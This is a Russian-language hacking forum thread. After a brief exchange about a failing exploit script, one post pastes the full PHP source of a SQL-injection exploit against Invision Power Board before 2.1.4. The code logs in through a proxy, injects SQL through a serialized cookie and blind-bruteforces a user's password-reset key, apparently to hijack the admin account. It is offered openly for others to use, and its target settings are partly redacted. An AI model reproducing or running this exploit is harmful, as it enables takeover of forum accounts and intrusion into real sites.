################################################## ########## Forum Host: http://*****/forum/ Forum Path: /forum Cennot Connect Host, it's can be beacuse the host dosed at C:\WebServers\usr\bin \ipb.pl line 36, <stdin> line 2. А как от этого избавиться?
ну с минимальными знаниями английского можно сказать, что.. 1) ты нифига не знаешь английский, написал текст видно сам.. с грубыми ошибками.. "dosed" и "closed" - найдите 10 отличий.. лол 2) скрипт не может приконнектиться из-за того что хост закрыт. это при дословном переводе с англ. 3) у тя Денвер чтоль стоит? хех).. пробуй запустить скрипт на удаленной никсовой системе) 4) проверь правильность ввода форума
Наткнулся в инете случайно. Сам не юзал. Может кому пригодится. Code: <? /* ____ ________ __________ /____ \/__ __ \ /__________ \_ _ // _ \ / / / \ \ \\______ \__ __ \/ / // /__/ / / \| _/ | \ / / \_____ / / || | \ | / / /_____ / / / ||____|___/____/ \______/ \_/ / |_________/_____/\_______/\___/ === - security team - === Invision Power Board < 2.1.4 Password change SQL-Injection Exploit by roOstY Ru24 Security Team <= www.Ru24-Team.net => ---- For example you can reset password for admin (link to "forget Password" add ask to change this password. At the end of exploit you get link to change admin password) Working in all Invision Power Forum forum before 2.1.4 but you need good mysql version ;) Greetz to Nitrex and Dukenn Regards to: Dr_UFO_51,k0pa,NSD,Naikon and other... Before runing,you must setup some settings WARNING: You must setup the CURL-module for PHP! ---- */ /* In any case at first you need to change password to $target if you can't understand that */ // error_reporting(E_ALL); ############ Settings ########################################################### $proxy="24.48.*.*:**"; ## - your socks 4/5-proxy $host="http://forum.***.lt"; ## - target forum $login="********"; ## - login to forum $password="*****"; ## - pass to forum $cook_name="ibf_topicsread"; ## - target cookie name (default: ibf_topicsread) $topic=22; ## - any real topyc $target=1; ## - id target to admin or other user that you want to reset password ##### # At first you need to reset pasword for target user. # For example you can reset password for admin (link to "forget Password" add ask to change this password. At the end of you get link to change admin password) #### $len=32; ## 5 for salt ## it's my $ver=1; ## if not wor change to 2 $cookie_file_path = "/tmp/cookie"; ## for my opinuion, you can to set other $agent = "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"; ################################################################################ $cookie=""; echo "Login..."; $url=$host."/index.php?act=Login&CODE=01&CookieDate=1"; $reffer=$host."/index.php?act=Login&CODE=00"; $post['UserName']=urlencode($login); $post['PassWord']=urlencode($password); $result=querry($url,$agent,$proxy,$reffer,$cookie_file_path,$post,""); ###### Login to the forum $cook=getcookiee($result); foreach ($cook as $k=>$v) { $cookie[$k]=$v; } if (!strstr($result,$login)) { echo "error. Invalid Login or Password then Login\n"; exit; } else echo "done\n"; echo "Redirecting to main page..."; $url=$host.urldecode(ExtractString($result,$host,"\" ")); $result=querry($url,$agent,$proxy,$reffer,$cookie_file_path,"",""); ###### Redirect to the main page $cook=getcookiee($result); foreach ($cook as $k=>$v) { $cookie[$k]=$v; } if (!strstr($result,$login)) { echo "error. Invalid Login or Password then Redirect\n"; exit; } else echo "done\n"; $reffer=$url; echo "Going to Control Panel..."; $url=$host."/index.php?act=UserCP&CODE=00"; $reffer="";$agent=""; $result=querry($url,$agent,$proxy,$reffer,$cookie_file_path,"",""); ###### Go te the control panel $cook=getcookiee($result); foreach ($cook as $k=>$v) { $cookie[$k]=$v; } if (!strstr($result,$login)) { echo "error. Invalid Login or Password then going to Control\n"; exit; } echo "done\n"; echo "Get table prefix..."; $arr[$topic]=1111111111; $arr['-1) andd']=$topic; $cookie_base=""; foreach ( $cookie as $k=>$v ) { $cookie_base.= $k."=".$v."; "; } $cookie_add=$cookie_base.$cook_name."=".urlencode(serialize($arr)); unset($arr); $result=querry($url,$agent,$proxy,$reffer,$cookie_file_path,"",$cookie_add); if (!(strstr($result,"Error"))) { echo "error. Target seems not vuln"; exit; } $pref=ExtractString($result,"SELECT * FROM ","topics"); echo "done prefix: ".$pref."\n"; $al=""; echo "Checking Mysql version...."; $targval=explode(".",$target); $arr[$topic]=1111111111; $arr['-1) and @@version<4/*']=$topic; $cookie_add=$cookie_base."; ".$cook_name."=".urlencode(serialize($arr)); unset($arr); $result=querry($url,$agent,$proxy,$reffer,$cookie_file_path,"",$cookie_add); if (!strstr($result,"showtopic=".$target)) echo "done Mysql ver > 4 - GOOD!\n"; else { echo "done Mysql ver < 4. We can use only dos\n"; exit; } echo "Exploiting...."; $sent='%61%3A%32%3A%7B%73%3A'; if ($ver==1) $exp="-999) UNION SELECT 0,vid,null,'open',0,1,1132440935,1,11132440935,0,null,null,0,0,2,2,1,0,0,0,0,0,1,0,0,0,0,0,0 from ".$pref."validating where member_id=".$target." LIMIT 1/*"; else $exp="-999) UNION SELECT 0,vid,null,'open',0,1,1132440935,1,11132440935,0,null,null,0,0,2,2,1,0,0,null,null,0,0,1,0 from ".$pref."validating where member_id=".$target." LIMIT 1/*"; $arr[$topic]=1111111111; $arr[$exp]=$topic; $cookie_add=$cookie_base."; ".$cook_name."=".urlencode(serialize($arr)); unset($arr); $result=querry($url,$agent,$proxy,$reffer,$cookie_file_path,"",$cookie_add); if (!strstr($result,"different number of columns")) { echo "done\n"; $vid=substr($result,strpos($result,"</a></span>")-32,32); echo "Done\nGoto url: [".$host."/index.php?act=Reg&CODE=lostpassform&uid=".$target."&aid=".$vid."] and change user password!\n"; } else { echo "bad Can't find number of colums\n"; } echo "Checking Mysql version 2...."; $targval=explode(".",$target); $arr[$topic]=1111111111; $arr['-1) and @@version<4.1/*']=$topic; $cookie_add=$cookie_base."; ".$cook_name."=".urlencode(serialize($arr)); unset($arr); $result=querry($url,$agent,$proxy,$reffer,$cookie_file_path,"",$cookie_add); //echo $result;exit; if (!strstr($result,"showtopic=".$target)) echo "done Mysql ver > 4.1 - GOOD!\n"; else { echo "done Mysql ver < 4.1. We can't use SUBSELECT\n"; exit; } echo "Bruteforcing....\n"; $val=""; for ($j=16;$j<=$len;$j++) { $a2=128; $a1=32; while (($a2-$a1)>=5) { $s=round(($a1+$a2)/2,0); echo $s; $arr[$topic]=1111111111; $arr['-1) and '.$s.'>(select ord(substring(vid,'.$j.',1)) from '.$pref.'validating where member_id='.$target.' LIMIT 1)/*']=$topic; $cookie_add=$cookie_base."; ".$cook_name."=".urlencode(serialize($arr)); unset($arr); $result=querry($url,$agent,$proxy,$reffer,$cookie_file_path,"",$cookie_add); if ((strstr($result,"Error"))) { echo "Error querry!\n"; exit; } if (strstr($result,"showtopic")) $a2=$s; else $a1=$s; } for ($i=$a1;$i<=$a2;$i++) { echo $i; $arr[$topic]=1111111111; $arr['-1) and '.$i.'=(select ord(substring(vid,'.$j.',1)) from '.$pref.'validating where member_id='.$target.' LIMIT 1)/*']=$topic; $cookie_add=$cookie_base."; ".$cook_name."=".urlencode(serialize($arr)); $result=querry($url,$agent,$proxy,$reffer,$cookie_file_path,"",$cookie_add); // echo urlencode(serialize($arr)).$result;exit; if (strstr($result,"showtopic")) { $val .= chr($i); echo " - Get_symb:[".$j."] ".chr($i)."\n"; break; } } } echo "Done\nGoto url: [".$host."/index.php?act=Reg&CODE=lostpassform&uid=".$target."&aid=".strtolower($val)."] and change user password!\n"; function getcookiee($result) { $res = explode("\n",$result); foreach ($res as $k=>$v ) { if (ereg("Set-Cookie",$v)) { $c_a = explode(";",trim(str_replace("Set-Cookie:","",$v))); foreach ($c_a as $k=>$v ) { if (!(ereg("expires",$v))) { $arr=explode("=",trim($v)); $cook[trim($arr[0])]=trim($arr[1]); } } } } return $cook; } function querry($url,$agent,$proxy,$reffer,$cookie_file_path,$post,$cookie) { $ch = curl_init (); curl_setopt ($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_USERAGENT, $agent); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); if ($post!="") { curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $post); } curl_setopt ($ch, CURLOPT_TIMEOUT, 120); curl_setopt ($ch, CURLOPT_PROXY, $proxy); curl_setopt ($ch, CURLOPT_PROXYTYPE, CURLPROXY_SOCKS5); curl_setopt ($ch, CURLOPT_RETURNTRANSFER, TRUE); curl_setopt ($ch, CURLOPT_FAILONERROR, false); curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_REFERER, $reffer); if ($cookie!="") curl_setopt($ch, CURLOPT_COOKIE, $cookie); // else { curl_setopt($ch, CURLOPT_COOKIEFILE, $cookie_file_path); curl_setopt($ch, CURLOPT_COOKIEJAR, $cookie_file_path); // } curl_setopt($ch, CURLOPT_HEADER, 1); $result = curl_exec($ch); $error=curl_errno($ch); curl_close ($ch); if ($error) $result="Fucking Error: ".$error."\r\n"; if ($error==7) $result=$result." Failed to connect() to host or proxy.\r\n"; if ($error==28) $result=$result." Operation timeout. The specified time-out period was reached according to the conditions.\r\n"; if ($error==22) $result=$result." Sorry, Unable to process request at this time, Please try again later.\r\n"; return $result; } function ExtractString($str, $start, $end) { $str_low = ($str); if (strpos($str_low, $start) !== false && strpos($str_low, $end, strpos($str_low, $start)) !== false) { $pos1 = strpos($str_low, $start) + strlen($start); $pos2 = strpos($str_low, $end,strpos($str_low, $start)) - $pos1; return substr($str, $pos1, $pos2); } } ?> источник http://www.ru24-team.net/